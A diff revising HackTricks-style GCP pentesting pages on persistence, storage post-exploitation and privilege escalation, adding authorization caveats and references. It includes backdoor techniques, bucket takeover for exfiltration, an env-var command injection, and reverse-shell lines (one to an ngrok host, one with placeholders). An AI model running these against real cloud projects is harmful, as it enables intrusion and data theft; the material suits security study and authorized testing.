+- [9] [gcloud auth application-default print-access-token](https://docs.cloud.google.com/sdk/gcloud/reference/auth/application-default/print-access-token)
+- [10] [Method: users.environments.addPublicKey](https://docs.cloud.google.com/shell/docs/reference/rest/v1/users.environments/addPublicKey)
+- [11] [Method: users.environments.start](https://docs.cloud.google.com/shell/docs/reference/rest/v1/users.environments/start)
+- [12] [Method: users.environments.get](https://docs.cloud.google.com/shell/docs/reference/rest/v1/users.environments/get)
+- [13] [How an attacker can achieve persistence in Google Cloud Platform (GCP) with Cloud Shell](https://www.ibm.com/think/x-force/attacker-achieve-persistence-google-cloud-platform-cloud-shell)
+- [14] [Disable or reset Cloud Shell](https://docs.cloud.google.com/shell/docs/resetting-cloud-shell)
+- [15] [Free Google Cloud features and trial offer](https://docs.cloud.google.com/free/docs/free-cloud-features)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-

--- a/src/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-sql-persistence.md
+++ b/src/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-sql-persistence.md
@@ -1,7 +1,5 @@
 # GCP - Cloud SQL Persistence
 
-{{#include ../../../banners/hacktricks-training.md}}
-
 ## Cloud SQL
 
 For more information about Cloud SQL check:
@@ -10,31 +8,55 @@ For more information about Cloud SQL check:
 ../gcp-services/gcp-cloud-sql-enum.md
 {{#endref}}
 
-### Expose the database and whitelist your IP address
+### Expose a database and whitelist your client IP
 
-A database only accessible from an internal VPC can be exposed externally and your IP address can be whitelisted so you can access it.\
+`authorized networks` controls which client IP addresses or ranges can connect over IP. For a direct public-IP connection, the instance must have a public IPv4 address and the client address must be authorized; adding an address to the list does not by itself turn a private-IP-only instance into a public endpoint.<sup>[[1]](#references)[[2]](#references)</sup>
+
+For an authorized assessment, add only the narrow client range required for the test and remove it afterward.
+
+Because `gcloud sql instances patch --authorized-networks` replaces the existing authorized-networks list, preserve the existing entries when updating it.<sup>[[1]](#references)</sup>
+
+For the corresponding permission requirements and a connection example, see:
+
+{{#ref}}
+../gcp-post-exploitation/gcp-cloud-sql-post-exploitation.md
+{{#endref}}
+
+### Create a user or rotate a password
+
+Cloud SQL supports built-in database authentication with a username and password, separately from IAM database authentication, which uses IAM principals and access tokens. The steps below target built-in users.<sup>[[3]](#references)</sup>
+
+An identity with `cloudsql.users.create` can create a Cloud SQL user, `cloudsql.users.update` can change a user's password, and `cloudsql.users.list` can enumerate users through the Cloud SQL Admin API.<sup>[[4]](#references)</sup> These IAM permissions govern the Cloud SQL API operation; they do not replace database-engine privileges when making changes from inside a database session.
+
+The corresponding `gcloud` commands are:<sup>[[5]](#references)[[6]](#references)[[7]](#references)</sup>
+
+```bash
+gcloud sql users list --instance=<INSTANCE>
+gcloud sql users create <USERNAME> --instance=<INSTANCE> --password=<PASSWORD>
+gcloud sql users set-password <USERNAME> --instance=<INSTANCE> --password=<PASSWORD>
+```
+
+The list operation enumerates users, while `set-password` changes a password; neither should be treated as a way to retrieve an existing password.<sup>[[5]](#references)[[7]](#references)[[8]](#references)</sup> When creating users, account for engine-specific behavior: for example, on Cloud SQL for MySQL 8.0 or later, a built-in user created without explicit database roles receives the `cloudsqlsuperuser` role automatically, so specify the intended least-privilege roles during an authorized test.<sup>[[6]](#references)[[8]](#references)</sup>
+
+Where an authorized database session exposes engine-specific password hashes, offline password auditing may be possible; brute-force attempts against a live endpoint should be explicitly approved and rate-limited.
+
+For database-native user creation or password changes, use the engine's own administration commands after obtaining an authorized database session.
+
 For more information check the technique in:
 
 {{#ref}}
 ../gcp-post-exploitation/gcp-cloud-sql-post-exploitation.md
 {{#endref}}
 
-### Create a new user / Update users password / Get password of a user
+## References
 
-To connect to a database you **just need access to the port** exposed by the database and a **username** and **password**. With e**nough privileges** you could **create a new user** or **update** an existing user **password**.\
-Another option would be to **brute force the password of an user** by trying several password or by accessing the **hashed** password of the user inside the database (if possible) and cracking it.\
-Remember that **it's possible to list the users of a database** using GCP API.
-
-> [!NOTE]
-> You can create/update users using GCP API or from inside the databae if you have enough permissions.
-
-For more information check the technique in:
-
-{{#ref}}
-../gcp-post-exploitation/gcp-cloud-sql-post-exploitation.md
-{{#endref}}
+- [1] [Authorize with authorized networks | Cloud SQL for MySQL](https://cloud.google.com/sql/docs/mysql/authorize-networks)
+- [2] [Configure public IP | Cloud SQL for MySQL](https://cloud.google.com/sql/docs/mysql/configure-ip)
+- [3] [IAM authentication | Cloud SQL for MySQL](https://cloud.google.com/sql/docs/mysql/iam-authentication)
+- [4] [Cloud SQL permissions | Cloud SQL for MySQL](https://cloud.google.com/sql/docs/mysql/iam-permissions)
+- [5] [gcloud sql users list](https://cloud.google.com/sdk/gcloud/reference/sql/users/list)
+- [6] [gcloud sql users create](https://cloud.google.com/sdk/gcloud/reference/sql/users/create)
+- [7] [gcloud sql users set-password](https://cloud.google.com/sdk/gcloud/reference/sql/users/set-password)
+- [8] [Manage users with built-in authentication | Cloud SQL for MySQL](https://cloud.google.com/sql/docs/mysql/create-manage-users)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-

--- a/src/pentesting-cloud/gcp-security/gcp-persistence/gcp-compute-persistence.md
+++ b/src/pentesting-cloud/gcp-security/gcp-persistence/gcp-compute-persistence.md
@@ -1,22 +1,93 @@
 # GCP - Compute Persistence
 
-{{#include ../../../banners/hacktricks-training.md}}
-
 ## Compute
 
-For more informatoin about Compute and VPC (Networking) check:
+For more information about Compute and VPC (Networking), check:
 
 {{#ref}}
 ../gcp-services/gcp-compute-instances-enum/
 {{#endref}}
 
-### Persistence abusing Instances & backups
+### Persistence abusing instances and backups
 
-- Backdoor existing VMs
-- Backdoor disk images and snapshots creating new versions
-- Create new accessible instance with a privileged SA
+> [!CAUTION]
+> Run these steps only in an approved assessment project. Use a benign marker instead of a callback or credential dump, and remove test metadata and resources after validation.
+
+#### Backdoor an existing VM
+
+On Linux VMs, the guest environment reads the `startup-script` metadata key and runs the script as `root` during boot. Public Compute Engine images include the guest environment; a custom image needs it installed for metadata scripts to run. VM-level startup metadata overrides a project-level startup script, so an unauthorized instance metadata change can re-establish a local change after later boots.<sup>[[1]](#references)</sup>
+
+Adding or updating that key on an existing VM requires `compute.instances.setMetadata`; the documented `gcloud` flow is `instances add-metadata` with either inline metadata or `--metadata-from-file`.<sup>[[1]](#references)[[2]](#references)</sup> For an authorized test, point the key at a local script that writes a marker under a designated assessment path:
+
+```bash
+gcloud compute instances add-metadata VM_NAME \
+  --zone=ZONE \
+  --metadata-from-file startup-script=STARTUP_SCRIPT
+```
+
+Because the script is triggered during boot, reboot the test VM and verify the marker or inspect `google-startup-scripts.service` output. Do not put secrets in startup metadata: the script runs with root privileges and, when the VM has a service account, can use that workload identity.<sup>[[1]](#references)[[6]](#references)[[7]](#references)</sup>
+
+#### Backdoor disk images and snapshots
+
+A snapshot can be copied to a new persistent disk, and a custom image can be created from a persistent disk, snapshot, or another image. In an authorized assessment, use a copy of the source snapshot, boot that copy on a temporary VM, make a benign filesystem change that represents the persistence mechanism, and capture the modified disk as a new image. Future VMs created from that image inherit the modified filesystem.<sup>[[3]](#references)[[4]](#references)[[5]](#references)</sup>
+
+```bash
+gcloud compute disks create MODIFIED_DISK \
+  --source-snapshot=SOURCE_SNAPSHOT \
+  --zone=ZONE
+
+gcloud compute instances create TEMP_VM \
+  --zone=ZONE \
+  --machine-type=MACHINE_TYPE \
+  --disk=name=MODIFIED_DISK,boot=yes,auto-delete=no
+```
+
+After applying the approved marker or service change inside `TEMP_VM`, stop it before creating the image. Compute Engine does not create an image from a running instance by default; the documented `--force` option should be used only when intentionally capturing a live disk.<sup>[[3]](#references)</sup>
+
+```bash
+gcloud compute images create PERSISTENT_IMAGE \
+  --source-disk=MODIFIED_DISK \
+  --source-disk-zone=ZONE
+
+gcloud compute instances create TEST_VM \
+  --zone=ZONE \
+  --machine-type=MACHINE_TYPE \
+  --image=PERSISTENT_IMAGE
+```
+
+#### Create a new accessible instance with a privileged service account
+
+Code running on a Compute Engine VM uses the service account attached to that VM for Google Cloud authentication. IAM roles granted to the service account determine its resource permissions, while the VM's OAuth access scopes can further restrict requests made through gcloud and client libraries; `cloud-platform` does not grant permissions that the service account does not already have.<sup>[[6]](#references)</sup> A principal creating the VM must also have `iam.serviceAccounts.actAs` on the service account, commonly through `roles/iam.serviceAccountUser`.<sup>[[8]](#references)</sup>
+
+For an authorized test, create a disposable VM with the selected service account and the scope required by the test.<sup>[[5]](#references)[[6]](#references)</sup>
+
+```bash
+gcloud compute instances create PERSISTENT_VM \
+  --zone=ZONE \
+  --machine-type=MACHINE_TYPE \
+  --image-family=IMAGE_FAMILY \
+  --image-project=IMAGE_PROJECT \
+  --service-account=PRIVILEGED_SERVICE_ACCOUNT \
+  --scopes=cloud-platform
+```
+
+Applications on the VM can use Application Default Credentials or request an access token from the metadata server. Validate the attached identity without exposing a token by querying the service-account directory from inside the test VM:<sup>[[7]](#references)[[9]](#references)</sup>
+
+```bash
+curl "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/" \
+  -H "Metadata-Flavor: Google"
+```
+
+## References
+
+- [1] [Use startup scripts on Linux VMs | Compute Engine](https://docs.cloud.google.com/compute/docs/instances/startup-scripts/linux)
+- [2] [gcloud compute instances add-metadata](https://docs.cloud.google.com/sdk/gcloud/reference/compute/instances/add-metadata)
+- [3] [Create custom images | Compute Engine](https://docs.cloud.google.com/compute/docs/images/create-custom)
+- [4] [gcloud compute disks create](https://docs.cloud.google.com/sdk/gcloud/reference/compute/disks/create)
+- [5] [gcloud compute instances create](https://docs.cloud.google.com/sdk/gcloud/reference/compute/instances/create)
+- [6] [Service accounts | Compute Engine](https://docs.cloud.google.com/compute/docs/access/service-accounts)
+- [7] [Authenticate workloads to Google Cloud APIs using service accounts | Compute Engine](https://docs.cloud.google.com/compute/docs/access/authenticate-workloads)
+- [8] [Attach service accounts to resources | Identity and Access Management](https://docs.cloud.google.com/iam/docs/attach-service-accounts)
+- [9] [Change the attached service account | Compute Engine](https://docs.cloud.google.com/compute/docs/instances/change-service-account)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-

--- a/src/pentesting-cloud/gcp-security/gcp-persistence/gcp-dataflow-persistence.md
+++ b/src/pentesting-cloud/gcp-security/gcp-persistence/gcp-dataflow-persistence.md
@@ -1,36 +1,38 @@
 # GCP - Dataflow Persistence
 
-{{#include ../../../banners/hacktricks-training.md}}
-
 ## Dataflow
 
 ### Invisible persistence in built container
 
-Following the [**tutorial from the documentation**](https://cloud.google.com/dataflow/docs/guides/templates/using-flex-templates) you can create a new (e.g. python) flex template:
+A Dataflow Flex Template packages pipeline code in a container image and a JSON template specification. The documented Python workflow builds the image and specification with `gcloud dataflow flex-template build`, then starts a job with `gcloud dataflow flex-template run`.<sup>[[1]](#references)[[2]](#references)[[4]](#references)</sup>
+
+If an authorized tester can influence the environment variables supplied to the image build, the `--env` option places them in the generated Dockerfile. Python Flex Templates use `FLEX_TEMPLATE_PYTHON_PY_FILE` to select the launcher script; Google’s examples copy that script under `/template`, and a later job downloads the image from Artifact Registry and starts it.<sup>[[1]](#references)[[2]](#references)[[3]](#references)</sup>
 
 <details>
 
-<summary>Create Dataflow flex template with backdoor</summary>
+<summary>Build a Dataflow Flex Template with a harmless build-time probe</summary>
 
 ```bash
 git clone https://github.com/GoogleCloudPlatform/python-docs-samples.git
 cd python-docs-samples/dataflow/flex-templates/getting_started
 
-# Create repository where dockerfiles and code is going to be stored
-export REPOSITORY=flex-example-python
-gcloud storage buckets create gs://$REPOSITORY
+# Use only a project and build service account in the authorized test scope.
+export PROJECT_ID="your-project-id"
+export REGION="us-central1"
+export BUCKET="your-unique-bucket"
+export REPOSITORY="flex-example-python"
 
-# Create artifact storage
-export NAME_ARTIFACT=flex-example-python
-gcloud artifacts repositories create $NAME_ARTIFACT \
+gcloud storage buckets create "gs://$BUCKET" --location="$REGION"
+
+# Create Artifact Registry storage for the template image.
+gcloud artifacts repositories create "$REPOSITORY" \
  --repository-format=docker \
- --location=us-central1
-gcloud auth configure-docker us-central1-docker.pkg.dev
+ --location="$REGION"
+gcloud auth configure-docker "$REGION-docker.pkg.dev"
 
-# Create template
-export NAME_TEMPLATE=flex-template
-gcloud dataflow $NAME_TEMPLATE build gs://$REPOSITORY/getting_started-py.json \
- --image-gcr-path "us-central1-docker.pkg.dev/gcp-labs-35jfenjy/$NAME_ARTIFACT/getting-started-python:latest" \
+# Build the template image and its JSON specification.
+gcloud dataflow flex-template build "gs://$BUCKET/getting_started-py.json" \
+ --image-gcr-path "$REGION-docker.pkg.dev/$PROJECT_ID/$REPOSITORY/getting-started-python:latest" \
  --sdk-language "PYTHON" \
  --flex-template-base-image "PYTHON3" \
  --metadata-file "metadata.json" \
@@ -38,31 +40,43 @@ gcloud dataflow $NAME_TEMPLATE build gs://$REPOSITORY/getting_started-py.json \
  --env "FLEX_TEMPLATE_PYTHON_PY_FILE=getting_started.py" \
  --env "FLEX_TEMPLATE_PYTHON_REQUIREMENTS_FILE=requirements.txt" \
  --env "PYTHONWARNINGS=all:0:antigravity.x:0:0" \
- --env "/bin/bash -c 'bash -i >& /dev/tcp/0.tcp.eu.ngrok.io/13355 0>&1' & #%s" \
- --region=us-central1
+ --env "BROWSER=/bin/sh -c 'printf dataflow-flex-template-probe >/tmp/dataflow-flex-template-probe' #%s"
 ```
+
+The resource setup and canonical build command above follow Google’s tutorial and Python sample; the `--env` flag’s Dockerfile behavior is documented in the Google Cloud CLI reference, while the `PYTHONWARNINGS` and `BROWSER` values are the lab-specific probe.<sup>[[1]](#references)[[2]](#references)[[3]](#references)[[4]](#references)[[5]](#references)[[6]](#references)</sup>
 
 </details>
 
-**While it's building, you will get a reverse shell** (you could abuse env variables like in the previous example or other params that sets the Docker file to execute arbitrary things). In this moment, inside the reverse shell, it's possible to **go to the `/template` directory and modify the code of the main python script that will be executed (in our example this is `getting_started.py`)**. Set your backdoor here so everytime the job is executed, it'll execute it.
+`PYTHONWARNINGS` is equivalent to Python’s `-W` option, while `webbrowser` honors `BROWSER` and substitutes the URL for `%s`; original security research shows how this combination can trigger command execution when a Python interpreter starts.<sup>[[5]](#references)[[6]](#references)[[7]](#references)</sup> The probe only writes a marker file. Replace it with an approved validation action only inside an isolated engagement; a build-time callback depends on the selected base image and whether its build path launches Python, so it is not guaranteed to be a reverse shell.<sup>[[2]](#references)[[7]](#references)</sup>
 
-Then, next time the job is executed, the compromised container built will be run:
+For a controlled callback, replace only the marker action with an engagement-owned listener such as `BROWSER=/bin/bash -c 'bash -i >& /dev/tcp/<LISTENER-ADDR>/<LISTENER-PORT> 0>&1' #%s`; never use a third-party endpoint, and remove the callback after testing.
+
+If build-time command execution is obtained in the authorized build environment, modify `/template/getting_started.py` before the image build finishes. That is the script selected by `FLEX_TEMPLATE_PYTHON_PY_FILE`; because the resulting image and template specification are stored for later launches, a subsequent run can execute the modified code (the persistence conclusion follows from the documented image/specification workflow).<sup>[[1]](#references)[[2]](#references)</sup>
+
+Then run the template again to exercise the image:
 
 <details>
 
 <summary>Run Dataflow template</summary>
 
 ```bash
-# Run template
-gcloud dataflow $NAME_TEMPLATE run testing \
- --template-file-gcs-location="gs://$NAME_ARTIFACT/getting_started-py.json" \
- --parameters=output="gs://$REPOSITORY/out" \
- --region=us-central1
+# Run the template using the same specification and image.
+gcloud dataflow flex-template run "testing-$(date +%Y%m%d-%H%M%S)" \
+ --template-file-gcs-location="gs://$BUCKET/getting_started-py.json" \
+ --parameters=output="gs://$BUCKET/out" \
+ --region="$REGION"
 ```
 
 </details>
 
+## References
+
+- [1] [Build and run an example Flex Template](https://cloud.google.com/dataflow/docs/guides/templates/using-flex-templates)
+- [2] [Use Flex Templates to package a Dataflow pipeline for deployment](https://cloud.google.com/dataflow/docs/guides/templates/configuring-flex-templates)
+- [3] [gcloud beta dataflow flex-template build](https://cloud.google.com/sdk/gcloud/reference/beta/dataflow/flex-template/build)
+- [4] [Dataflow flex template: Getting started sample](https://github.com/GoogleCloudPlatform/python-docs-samples/tree/main/dataflow/flex-templates/getting_started)
+- [5] [Command line and environment](https://docs.python.org/3/using/cmdline.html#envvar-PYTHONWARNINGS)
+- [6] [webbrowser — Convenient web-browser controller](https://docs.python.org/3/library/webbrowser.html)
+- [7] [Hacking with Environment Variables](https://www.elttam.com/blog/env)
+
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-

--- a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-storage-post-exploitation.md
+++ b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-storage-post-exploitation.md
@@ -1,10 +1,8 @@
 # GCP - Storage Post Exploitation
 
-{{#include ../../../banners/hacktricks-training.md}}
-
 ## Cloud Storage
 
-For more information about CLoud Storage check this page:
+For more information about Cloud Storage check this page:
 
 {{#ref}}
 ../gcp-services/gcp-storage-enum.md
@@ -12,7 +10,7 @@ For more information about CLoud Storage check this page:
 
 ### Give Public Access
 
-It's possible to give external users (logged in GCP or not) access to buckets content. However, by default bucket will have disabled the option to expose publicly a bucket:
+It's possible to give external users (logged in GCP or not) access to bucket content. When public access prevention is enforced directly or inherited from an organization policy, public IAM and ACL grants are blocked. The first command below changes the bucket setting to `inherited`; an organization policy can still enforce prevention.<sup>[[1]](#references)[[2]](#references)</sup>
 
 ```bash
 # Disable public prevention
@@ -27,9 +25,11 @@ gcloud storage buckets update gs://BUCKET_NAME --add-acl-grant=entity=AllUsers,r
 gcloud storage objects update gs://BUCKET_NAME/OBJECT_NAME --add-acl-grant=entity=AllUsers,role=READER
 ```
 
-If you try to give **ACLs to a bucket with disabled ACLs** you will find this error: `ERROR: HTTPError 400: Cannot use ACL API to update bucket policy when uniform bucket-level access is enabled. Read more at https://cloud.google.com/storage/docs/uniform-bucket-level-access`
+The `allUsers` IAM grant makes all objects publicly readable. The ACL commands can make a bucket or individual object public only when uniform bucket-level access is not enabled; public access prevention overrides both mechanisms.<sup>[[1]](#references)[[2]](#references)[[3]](#references)</sup>
 
-To access open buckets via browser, access the URL `https://<bucket_name>.storage.googleapis.com/` or `https://<bucket_name>.storage.googleapis.com/<object_name>`
+If you try to give **ACLs to a bucket with disabled ACLs** you will find this error: `ERROR: HTTPError 400: Cannot use ACL API to update bucket policy when uniform bucket-level access is enabled. Read more at https://cloud.google.com/storage/docs/uniform-bucket-level-access`<sup>[[3]](#references)</sup>
+
+To access open buckets via browser, access the URL `https://<bucket_name>.storage.googleapis.com/` or `https://<bucket_name>.storage.googleapis.com/<object_name>`.<sup>[[4]](#references)</sup>
 
 ### `storage.objects.delete` (`storage.objects.get`)
 
@@ -38,6 +38,8 @@ To delete an object:
 gcloud storage rm gs://<BUCKET_NAME>/<OBJECT_NAME> --project=<PROJECT_ID>
 ```
 
+`storage.objects.delete` is the permission that deletes objects; `storage.objects.get` instead reads object data and metadata. The command above uses the documented object URL form.<sup>[[5]](#references)[[6]](#references)</sup>
+
 ### `storage.buckets.delete`, `storage.objects.delete` & `storage.objects.list`
 
 To delete a bucket:
@@ -45,9 +47,11 @@ To delete a bucket:
 gcloud storage rm -r gs://<BUCKET_NAME>
 ```
 
+The recursive form deletes the bucket's objects, including versions, before deleting the bucket. The permissions named above correspond to bucket deletion, object deletion, and object listing.<sup>[[5]](#references)[[6]](#references)</sup>
+
 ### Global bucket name takeover of upstream writers
 
-Cloud Storage bucket names are globally unique. Before deleting a bucket, check whether any automated service keeps writing to that bucket by name. If the bucket is deleted and the same name is recreated in an attacker-controlled project, upstream writers such as Cloud Logging sinks, Pub/Sub Cloud Storage subscriptions, or Storage Transfer Service jobs may continue writing future data to the replacement bucket.
+Cloud Storage bucket names are globally unique and can be reused after deletion. Before deleting a bucket, check whether any automated service keeps writing to that bucket by name. If the bucket is deleted and the same name is recreated in an attacker-controlled project, an upstream writer that still resolves its destination by name may continue writing future data to the replacement bucket. Unit 42 demonstrated this bucket-name redirection pattern for Cloud Logging, Pub/Sub, and Storage Transfer Service; Google Cloud has since changed Cloud Logging behavior so a sink stops routing when the destination bucket's parent project changes, so treat that variant as historical or conditional and verify the current behavior before relying on it.<sup>[[7]](#references)[[8]](#references)[[9]](#references)[[10]](#references)</sup>
 
 ```bash
 # Cloud Logging sinks using GCS
@@ -77,13 +81,17 @@ gcloud storage buckets add-iam-policy-binding gs://<BUCKET_NAME> \
   --project <ATTACKER_PROJECT_ID>
 ```
 
-**Potential Impact:** long-term exfiltration of logs, messages, transfer outputs, backups, or data pipeline artifacts without modifying the original router resource.
+The listing commands use the documented Cloud Logging, Pub/Sub, and Storage Transfer Service CLI operations. Cloud Logging sinks, Pub/Sub Cloud Storage subscriptions, and Storage Transfer Service jobs use service identities with destination write permissions, so a replacement bucket may also need an appropriate binding before delivery succeeds.<sup>[[9]](#references)[[11]](#references)[[12]](#references)[[13]](#references)[[14]](#references)[[15]](#references)[[16]](#references)[[17]](#references)</sup>
+
+The `roles/storage.objectCreator` binding shown above is suitable for writers that only need to create objects, such as the Cloud Logging and Pub/Sub examples. Current Storage Transfer Service guidance uses `roles/storage.legacyBucketWriter` on the destination bucket instead; verify the service-specific requirement before granting access.<sup>[[9]](#references)[[11]](#references)[[12]](#references)</sup>
+
+**Potential Impact:** long-term exfiltration of logs, messages, transfer outputs, backups, or data pipeline artifacts without modifying the original router resource.<sup>[[7]](#references)[[9]](#references)[[12]](#references)</sup>
 
 **Detection & Mitigation:** treat bucket deletion as high risk when the bucket is referenced by sinks/subscriptions/jobs, alert on dangling destinations, restrict `storage.buckets.delete`, and use retention policies or legal holds for critical export buckets when appropriate.
 
 ### Deactivate HMAC Keys
 
-The `storage.hmacKeys.update` permission allows disabling HMAC keys, and the `storage.hmacKeys.delete` permission allows an identity to delete HMAC keys associated with service accounts in Cloud Storage.
+The `storage.hmacKeys.update` permission allows changing an HMAC key's state, and `storage.hmacKeys.delete` allows deleting HMAC keys associated with service accounts. Both permissions apply at the project level.<sup>[[5]](#references)[[18]](#references)[[19]](#references)</sup>
 
 ```bash
 # Deactivate
@@ -93,14 +101,19 @@ gcloud storage hmac update <ACCESS_ID> --deactivate
 gcloud storage hmac delete <ACCESS_ID>
 ```
 
+An HMAC key must be inactive before it can be deleted, and deletion is permanent; the two commands above perform those operations in the required order.<sup>[[19]](#references)[[20]](#references)[[21]](#references)</sup>
+
 
 ### `storage.buckets.setIpFilter` & `storage.buckets.update`
-The `storage.buckets.setIpFilter` permission, together with the `storage.buckets.update` permission, allows an identity to configure IP address filters on a Cloud Storage bucket, specifying which IP ranges or addresses are allowed to access the bucket’s resources.
+The `storage.buckets.setIpFilter` permission, together with the `storage.buckets.update` permission, allows an identity to configure IP address filters on a Cloud Storage bucket, specifying which IP ranges or addresses are allowed to access the bucket's resources.<sup>[[5]](#references)</sup>
 
-To completely clear the IP filter, the following command can be used:
+To completely clear the IP filter, use the explicit clear flag:<sup>[[22]](#references)</sup>
 
 ```bash
-gcloud storage buckets update gs://<BUCKET_NAME> --project=<PROJECT_ID>
+# Clear the existing IP filter explicitly:
+gcloud storage buckets update gs://<BUCKET_NAME> \
+  --clear-ip-filter \
+  --project=<PROJECT_ID>
 ```
 
 To change the filtered IPs, the following command can be used:
@@ -123,6 +136,8 @@ The JSON file represents the filter itself, something like:
 }
 ```
 
+`--clear-ip-filter` removes the existing filter, while `--ip-filter-file` applies the JSON configuration shown above. The `ipFilter` resource uses the same fields for public ranges, cross-organization VPCs, and service-agent access.<sup>[[22]](#references)[[23]](#references)</sup>
+
 ### `storage.buckets.restore`
 Restore a bucket using:
 
@@ -131,7 +146,35 @@ gcloud storage restore gs://<BUCKET_NAME>#<GENERATION> \
   --project=<PROJECT_ID>
 ```
 
+This restores a soft-deleted bucket generation; `storage.buckets.restore` is the corresponding IAM permission. The CLI restores the empty bucket only, so restore its objects separately when needed.<sup>[[5]](#references)[[24]](#references)[[25]](#references)</sup>
+
+## References
+
+- [1] [Public access prevention](https://docs.cloud.google.com/storage/docs/public-access-prevention)
+- [2] [Make data public](https://docs.cloud.google.com/storage/docs/access-control/making-data-public)
+- [3] [Uniform bucket-level access](https://cloud.google.com/storage/docs/uniform-bucket-level-access)
+- [4] [Request endpoints](https://docs.cloud.google.com/storage/docs/request-endpoints)
+- [5] [IAM permissions for Cloud Storage](https://docs.cloud.google.com/storage/docs/access-control/iam-permissions)
+- [6] [gcloud storage rm](https://docs.cloud.google.com/sdk/gcloud/reference/storage/rm)
+- [7] [The Global Namespace Risk: Universal Bucket Hijacking Technique for Cloud Data Exfiltration](https://unit42.paloaltonetworks.com/cloud-bucket-hijacking-risks/)
+- [8] [About Cloud Storage buckets](https://docs.cloud.google.com/storage/docs/buckets)
+- [9] [Create Cloud Storage subscriptions](https://docs.cloud.google.com/pubsub/docs/create-cloudstorage-subscription)
+- [10] [Logging release notes](https://docs.cloud.google.com/logging/docs/release-notes)
+- [11] [Route logs to supported destinations](https://docs.cloud.google.com/logging/docs/export/configure_export_v2)
+- [12] [Agentless transfer permissions](https://docs.cloud.google.com/storage-transfer/docs/iam-cloud)
+- [13] [gcloud logging sinks list](https://docs.cloud.google.com/sdk/gcloud/reference/logging/sinks/list)
+- [14] [gcloud pubsub subscriptions list](https://docs.cloud.google.com/sdk/gcloud/reference/pubsub/subscriptions/list)
+- [15] [gcloud transfer jobs list](https://docs.cloud.google.com/sdk/gcloud/reference/transfer/jobs/list)
+- [16] [gcloud storage buckets create](https://docs.cloud.google.com/sdk/gcloud/reference/storage/buckets/create)
+- [17] [gcloud storage buckets add-iam-policy-binding](https://docs.cloud.google.com/sdk/gcloud/reference/storage/buckets/add-iam-policy-binding)
+- [18] [Projects.hmacKeys: update](https://docs.cloud.google.com/storage/docs/json_api/v1/projects/hmacKeys/update)
+- [19] [Projects.hmacKeys: delete](https://docs.cloud.google.com/storage/docs/json_api/v1/projects/hmacKeys/delete)
+- [20] [gcloud storage hmac update](https://docs.cloud.google.com/sdk/gcloud/reference/storage/hmac/update)
+- [21] [gcloud storage hmac delete](https://docs.cloud.google.com/sdk/gcloud/reference/storage/hmac/delete)
+- [22] [gcloud storage buckets update](https://docs.cloud.google.com/sdk/gcloud/reference/storage/buckets/update)
+- [23] [Buckets](https://docs.cloud.google.com/storage/docs/json_api/v1/buckets)
+- [24] [gcloud storage restore](https://docs.cloud.google.com/sdk/gcloud/reference/storage/restore)
+- [25] [Soft delete overview](https://docs.cloud.google.com/storage/docs/soft-delete)
+
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-

--- a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/README.md
+++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/README.md
@@ -1,23 +1,21 @@
 # GCP - Privilege Escalation
 
-{{#include ../../../banners/hacktricks-training.md}}
-
 ## Introduction to GCP Privilege Escalation <a href="#introduction-to-gcp-privilege-escalation" id="introduction-to-gcp-privilege-escalation"></a>
 
 GCP, as any other cloud, have some **principals**: users, groups and service accounts, and some **resources** like compute engine, cloud functions…\
 Then, via roles, **permissions are granted to those principals over the resources**. This is the way to specify the permissions a principal has over a resource in GCP.\
-There are certain permissions that will allow a user to **get even more permissions** on the resource or third party resources, and that’s what is called **privilege escalation** (also, the exploitation the vulnerabilities to get more permissions).
+There are certain permissions that will allow a user to **get even more permissions** on the resource or third party resources, and that’s what is called **privilege escalation** (also, the exploitation the vulnerabilities to get more permissions).<sup>[[1]](#references)[[5]](#references)</sup>
 
 Therefore, I would like to separate GCP privilege escalation techniques in **2 groups**:
 
-- **Privesc to a principal**: This will allow you to **impersonate another principal**, and therefore act like it with all his permissions. e.g.: Abuse _getAccessToken_ to impersonate a service account.
-- **Privesc on the resource**: This will allow you to **get more permissions over the specific resource**. e.g.: you can abuse _setIamPolicy_ permission over cloudfunctions to allow you to trigger the function.
-  - Note that some **resources permissions will also allow you to attach an arbitrary service account** to the resource. This means that you will be able to launch a resource with a SA, get into the resource, and **steal the SA token**. Therefore, this will allow to escalate to a principal via a resource escalation. This has happened in several resources previously, but now it’s less frequent (but can still happen).
+- **Privesc to a principal**: This will allow you to **impersonate another principal**, and therefore act like it with all his permissions. e.g.: Abuse _getAccessToken_ to impersonate a service account.<sup>[[1]](#references)</sup>
+- **Privesc on the resource**: This will allow you to **get more permissions over the specific resource**. e.g.: you can abuse _setIamPolicy_ permission over cloudfunctions to allow you to trigger the function.<sup>[[1]](#references)[[2]](#references)</sup>
+  - Note that some **resources permissions will also allow you to attach an arbitrary service account** to the resource. This means that you will be able to launch a resource with a SA, get into the resource, and **steal the SA token**. Therefore, this will allow to escalate to a principal via a resource escalation. This has happened in several resources previously, but now it’s less frequent (but can still happen).<sup>[[1]](#references)</sup>
 
 Obviously, the most interesting privilege escalation techniques are the ones of the **second group** because it will allow you to **get more privileges outside of the resources you already have** some privileges over. However, note that **escalating in resources** may give you also access to **sensitive information** or even to **other principals** (maybe via reading a secret that contains a token of a SA).
 
 > [!WARNING]
-> It's important to note also that in **GCP Service Accounts are both principals and permissions**, so escalating privileges in a SA will allow you to impersonate it also.
+> It's important to note also that in **GCP Service Accounts are both principals and resources with IAM policies**, so escalating privileges in a SA will allow you to impersonate it also.<sup>[[6]](#references)</sup>
 
 > [!NOTE]
 > The permissions between parenthesis indicate the permissions needed to exploit the vulnerability with `gcloud`. Those might not be needed if exploiting it through the API.
@@ -26,20 +24,20 @@ Obviously, the most interesting privilege escalation techniques are the ones of 
 
 This is how I **test for specific permissions** to perform specific actions inside GCP.
 
-1. Download the github repo [https://github.com/carlospolop/gcp_privesc_scripts](https://github.com/carlospolop/gcp_privesc_scripts)
-2. Add in tests/ the new script
+1. Download the github repo [https://github.com/carlospolop/gcp_privesc_scripts](https://github.com/carlospolop/gcp_privesc_scripts)<sup>[[4]](#references)</sup>
